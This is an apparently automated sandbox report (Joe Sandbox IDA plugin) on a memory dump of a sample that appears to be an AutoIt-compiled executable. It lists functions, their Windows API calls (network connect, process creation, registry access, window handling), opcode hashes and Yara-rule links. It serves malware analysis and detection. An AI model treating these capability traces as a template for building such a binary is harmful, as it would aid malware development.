Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
Instruction ID: a95cfacd970d2082239a09760f0c4252a35013321eec75828c038b7ca539ce4a
Opcode Fuzzy Hash: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
Instruction Fuzzy Hash: 353134326002509FDB21DF1ADC84F5537E1FB8A718F1811B4F508EF2B1CB72A8849B90

Function 00E5DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DB54
SysAllocString.OLEAUT32(00000000), ref: 00E5DB57
SysAllocString.OLEAUT32(?), ref: 00E5DB75
SysFreeString.OLEAUT32(?), ref: 00E5DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00E5DBA3
SysAllocString.OLEAUT32(?), ref: 00E5DBB1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 5d3b6c60da371ffd0de41adc8043a593448a71764500c10306b97c866d297e8a
Instruction ID: de8b6b66b3aab4dd3b1332be475bac2ef7be4b3276d2c405b5900da85937ed33
Opcode Fuzzy Hash: 5d3b6c60da371ffd0de41adc8043a593448a71764500c10306b97c866d297e8a
Instruction Fuzzy Hash: DF21C736604219AFDF60DFA9DC88CBB73EDEB08365B118525FD18EB251D670DC498760

Function 00E76173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E761C6
WSAGetLastError.WSOCK32(00000000), ref: 00E761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E7620E
connect.WSOCK32(00000000,?,00000010), ref: 00E76217
WSAGetLastError.WSOCK32 ref: 00E76221
closesocket.WSOCK32(00000000), ref: 00E7624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76263

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 4655276be9453771ede475a9d0d826cd3172de1cbbb3a8b8a215ed8c2b829b40
Instruction ID: 87399a7529aad41b02455b011a2c66d56cdfd573726c95984b0413720575a0f7
Opcode Fuzzy Hash: 4655276be9453771ede475a9d0d826cd3172de1cbbb3a8b8a215ed8c2b829b40
Instruction Fuzzy Hash: 6E31A471600514AFDF14AF64CC85BBD7BA8EB45718F048069FD09B7292DB70AC449B61

Function 00E5F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E5F671
__wcsnicmp.LIBCMT ref: 00E5F692
__wcsnicmp.LIBCMT ref: 00E5F6AC

Strings

#requireadmin, xrefs: 00E5F68C
#OnAutoItStartRegister, xrefs: 00E5F6A6
#notrayicon, xrefs: 00E5F669

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ba1952b7d0d3a250f2e9642e9f872c2457cd511caac88125babaf20e969fc488
Instruction ID: afa117517d7cd74d9ad686d3df20a6f8088fa220eac7d0cc7846153370878736
Opcode Fuzzy Hash: ba1952b7d0d3a250f2e9642e9f872c2457cd511caac88125babaf20e969fc488
Instruction Fuzzy Hash: C12149722142217ADA20AA34AC02FE773DCEF59345F10683AFD46B7091EB909D89C2D5

Function 00E5DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DC2F
SysAllocString.OLEAUT32(00000000), ref: 00E5DC32
SysAllocString.OLEAUT32 ref: 00E5DC53
SysFreeString.OLEAUT32 ref: 00E5DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00E5DC76
SysAllocString.OLEAUT32(?), ref: 00E5DC84

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6988bc55f7c778320f5e8d471f4cfe6cc53f70917ddd788cfae24f86bba287ba
Instruction ID: 2912299aec77b4c6d25d6bc6d225956202435b8d11e1594f77dba32f7c887198
Opcode Fuzzy Hash: 6988bc55f7c778320f5e8d471f4cfe6cc53f70917ddd788cfae24f86bba287ba
Instruction Fuzzy Hash: 48219835608204AFDB20DFB9DC88DABB7ECEB08361B118565FD15EB2A1D670DC49C764

Function 00E875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E87632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E8763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E8764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E87659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E87665

Strings

Msctls_Progress32, xrefs: 00E87603

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 689bbf79159b66119f4f761d6b659a864c87df1e75a452ea6190ff04fa3706c1
Instruction ID: 4b92f18f54b796829f237464315f4e6d2404235e7469566e9401c89265a46430
Opcode Fuzzy Hash: 689bbf79159b66119f4f761d6b659a864c87df1e75a452ea6190ff04fa3706c1
Instruction Fuzzy Hash: 5211D3B2110219BFEF109F64CC85EE77F5DEF08398F115115B648B20A0D6729C21DBA4

Function 00E29AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00E29AE6

Part of subcall function 00E23187: EncodePointer.KERNEL32(00000000), ref: 00E2318A
Part of subcall function 00E23187: __initp_misc_winsig.LIBCMT ref: 00E231A5
Part of subcall function 00E23187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E29EA0
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E29EB4
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E29EC7
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E29EDA
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E29EED
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E29F00
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E29F13
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E29F26
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E29F39
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E29F4C
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E29F5F
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E29F72
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E29F85
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E29F98
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E29FAB
Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E29FBE

__mtinitlocks.LIBCMT ref: 00E29AEB
__mtterm.LIBCMT ref: 00E29AF4

Part of subcall function 00E29B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E29AF9,00E27CD0,00EBA0B8,00000014), ref: 00E29C56
Part of subcall function 00E29B5C: _free.LIBCMT ref: 00E29C5D
Part of subcall function 00E29B5C: DeleteCriticalSection.KERNEL32(02,?,?,00E29AF9,00E27CD0,00EBA0B8,00000014), ref: 00E29C7F

__calloc_crt.LIBCMT ref: 00E29B19
__initptd.LIBCMT ref: 00E29B3B
GetCurrentThreadId.KERNEL32 ref: 00E29B42

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 0c9262548091f2332e608adff4dad2a392c81df024d93a0b13f16994e5a753dd
Instruction ID: 0d2314b693a189f163108cd70adcea04f992fa0a29b1685b0c959d884dadb088
Opcode Fuzzy Hash: 0c9262548091f2332e608adff4dad2a392c81df024d93a0b13f16994e5a753dd
Instruction Fuzzy Hash: 58F0903251A7315EE6347775BC0768A26D0EF42734F203A5AF464F51D3EF21844145A8

Function 00E8B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E8B644
_memset.LIBCMT ref: 00E8B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EC6F20,00EC6F64), ref: 00E8B682
CloseHandle.KERNEL32 ref: 00E8B694

Strings

do, xrefs: 00E8B64D
o, xrefs: 00E8B63E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: o$do
API String ID: 3277943733-2180341428
Opcode ID: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
Instruction ID: 7cf954725c038dfbba0bbd56d732743806a7eeb321e48610e31fc1426f6cf79c
Opcode Fuzzy Hash: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
Instruction Fuzzy Hash: F2F05EB2640350BEE2102B62BC06FBB3A9CEB08395F005038FA0CF5192D7728C0587A8

Function 00E2406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E23F85), ref: 00E24085
GetProcAddress.KERNEL32(00000000), ref: 00E2408C
EncodePointer.KERNEL32(00000000), ref: 00E24097
DecodePointer.KERNEL32(00E23F85), ref: 00E240B2

Strings

RoUninitialize, xrefs: 00E24074
combase.dll, xrefs: 00E24080

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
Instruction ID: 7427d3fcf5f5f1b2006c784e4c25da70115cf127132f68bf1284cf784194d582
Opcode Fuzzy Hash: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
Instruction Fuzzy Hash: 10E092B0582300AFEA10AF73ED0DF453AA4BB04B46F14903AF205F10A0CBB786499B15

Function 00E664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E6660B
_memmove.LIBCMT ref: 00E66546

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

_memmove.LIBCMT ref: 00E665B9
_memmove.LIBCMT ref: 00E666A0
_memmove.LIBCMT ref: 00E666B9
_memmove.LIBCMT ref: 00E666D5

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
Instruction ID: 15200df926c48acf4cdd213463187e2d3bad1b4ad6ec2e86927c076e954fcf1a
Opcode Fuzzy Hash: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
Instruction Fuzzy Hash: A5619A7090025A9BCF05EF60EC82AFE37A5AF05348F04A958F8567B2D3DB34A845CB50

Function 00E801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E80320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E80349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E8038C
RegCloseKey.ADVAPI32(00000000), ref: 00E80399

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 5a8126f61b3ffa3c7f29dd25c09702283616fc012fc81c9415f19f437ee2da87
Instruction ID: 5a4d0e071bcd54cfe14585b40aa7801066ca9f7783096f5b50fab4f72b3ea39d
Opcode Fuzzy Hash: 5a8126f61b3ffa3c7f29dd25c09702283616fc012fc81c9415f19f437ee2da87
Instruction Fuzzy Hash: 93515931108200AFC710EF64D885E6FBBE8FF85314F04591DF599A72A2DB31E949CB52

Function 00E85799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00E857FB
GetMenuItemCount.USER32(00000000), ref: 00E85832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E8585A
GetMenuItemID.USER32(?,?), ref: 00E858C9
GetSubMenu.USER32(?,?), ref: 00E858D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00E85928

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: a6cc82b2e9e8c886c5fcac05d99c0e8062a4c334f9d01b9e14659f8dfc7924d8
Instruction ID: 5adf6bc4db34fe99b9c24c8a550c8afe003ac88dd22e34864cbe8c45950183d4
Opcode Fuzzy Hash: a6cc82b2e9e8c886c5fcac05d99c0e8062a4c334f9d01b9e14659f8dfc7924d8
Instruction Fuzzy Hash: 0D516E76E00615EFCF15EF64C8459AEB7F4EF48310F10506AE859BB392CB34AE418B90

Function 00E5EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E5EF06
VariantClear.OLEAUT32(00000013), ref: 00E5EF78
VariantClear.OLEAUT32(00000000), ref: 00E5EFD3
_memmove.LIBCMT ref: 00E5EFFD
VariantClear.OLEAUT32(?), ref: 00E5F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E5F078

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 9f1ef02aca78842fe3ced804151d183dbfe679f8a12520355a734f4f81004040
Instruction ID: 1f5bbaf7c670f46ebebd75374c46c088a114981ec053a2eebbf29e72b61d9dbe
Opcode Fuzzy Hash: 9f1ef02aca78842fe3ced804151d183dbfe679f8a12520355a734f4f81004040
Instruction Fuzzy Hash: 8B516CB5A00209DFCB14CF58C884AAAB7B9FF4C314B15856AED59EB341E734E915CBA0

Function 00E6220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E62258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E622A3
IsMenu.USER32(00000000), ref: 00E622C3
CreatePopupMenu.USER32 ref: 00E622F7
GetMenuItemCount.USER32(000000FF), ref: 00E62355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E62386

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
Instruction ID: 162684595300cc8af454de4a8d9f1aa3ee2cd92d1db0a7e5e782e9e1d28aa4ae
Opcode Fuzzy Hash: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
Instruction Fuzzy Hash: 4451CF3068064ADFDF21CF68E888BADBBF4BF05398F10512DEA15B7290D3748944CB51

Function 00E01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00E0179A
GetWindowRect.USER32(?,?), ref: 00E017FE
ScreenToClient.USER32(?,?), ref: 00E0181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E0182C
EndPaint.USER32(?,?), ref: 00E01876

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: a4a461cfd398bb981b2a8d43bfc127ae08815cef655ad925110eeb5cb9963081
Instruction ID: e5361cf423ba0006bd6d90a3744663c4ed8b4f2a4d8a147ef9023049b8a705c7
Opcode Fuzzy Hash: a4a461cfd398bb981b2a8d43bfc127ae08815cef655ad925110eeb5cb9963081
Instruction Fuzzy Hash: F841B131100300AFC714DF25DC88FAA7BE8EB45724F044279F699AA1F1C731A889DB61

Function 00E8B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00EC57B0,00000000,013B5788,?,?,00EC57B0,?,00E8B5A8,?,?), ref: 00E8B712
EnableWindow.USER32(00000000,00000000), ref: 00E8B736
